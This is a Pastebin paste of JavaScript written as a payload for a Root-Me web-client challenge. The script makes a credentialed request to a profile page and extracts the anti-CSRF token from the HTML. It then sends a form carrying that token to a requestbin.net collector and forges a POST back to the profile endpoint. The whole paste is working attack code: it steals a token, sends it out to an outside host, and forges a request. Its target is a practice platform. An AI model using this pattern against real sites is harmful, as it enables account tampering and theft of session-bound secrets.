SHARE
TWEET

Untitled

a guest Dec 8th, 2019 94 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var xhr = new XMLHttpRequest();
  2.  
  3. xhr.withCredentials = true;
  4.  
  5. xhr.open("GET", "http://challenge01.root-me.org/web-client/ch23/?action=profile");
  6. xhr.send();
  7.  
  8. var resp = xhr.responseText;
  9. var n = resp.search('input id="token"');
  10. var token = resp.substring(51+n, n+51+32);
  11.  
  12. var username = 'blabla',
  13.           status = 'on',
  14.           boundary = '---------------------------' + Math.random().toString().substr(2),
  15.           data = '';
  16.  
  17. xhr.open("POST", 'http://requestbin.net/r/1d3jpxb1', true);
  18. xhr.setRequestHeader('Content-Type', 'multipart/form-data; charset=UTF-8; boundary=' + boundary);
  19.  
  20. data += '--' + boundary;
  21. data += '\r\nContent-Disposition: form-data; name="username"\r\n\r\n' + username + '\r\n';
  22. data += '--' + boundary;
  23. data += '\r\nContent-Disposition: form-data; name="status"\r\n\r\n' + status + '\r\n';
  24. data += '--' + boundary;
  25. data += '\r\nContent-Disposition: form-data; name="token"\r\n\r\n' + token + '\r\n';
  26. data += '--' + boundary + '--';
  27.  
  28. xhr.setRequestHeader('Content-Length', data.length);
  29.  
  30. xhr.send(data);
  31.  
  32.  
  33. xhr.open('POST', 'http://challenge01.root-me.org/web-client/ch23/?action=profile', true);
  34.  
  35.  
  36. xhr.setRequestHeader('Content-Type', 'multipart/form-data; charset=UTF-8; boundary=' + boundary);
  37. xhr.setRequestHeader('Content-Length', data.length);
  38.  
  39. xhr.send(data);
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top